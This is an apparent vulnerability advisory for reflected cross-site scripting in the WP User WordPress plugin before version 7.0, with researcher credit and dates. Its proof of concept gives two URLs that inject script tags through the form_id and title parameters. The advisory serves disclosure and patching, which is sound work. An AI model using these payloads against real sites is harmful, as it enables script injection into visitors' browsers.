WordPress Plugin Vulnerabilities

WP User < 7.0 - Reflected Cross-Site Scripting

Description

The plugin does not sanitise and escape some parameters in pages where the [wp_user] shortcode is used, leading to Reflected Cross-Site Scripting issues

Proof of Concept

PAGE_WITH_SHORTCODE is a page with the [wp_user] shortcode embed

https://example.com/?page_id={PAGE_WITH_SHORTCODE}&form_id="><script>alert(/XSS/)</script>
https://example.com//?page_id={PAGE_WITH_SHORTCODE}&form_id=1&title=<script>alert(2)</script>

Affects Plugins

Fixed in 7.0

References

Classification

Type
XSS
CWE

Miscellaneous

Original Researcher
Jeremie Amsellem
Submitter
Jeremie Amsellem
Submitter website
Submitter twitter
Verified
Yes

Timeline

Publicly Published
2022-01-31 (about 2 years ago)
Added
2022-01-31 (about 2 years ago)
Last Updated
2022-04-12 (about 2 years ago)

Other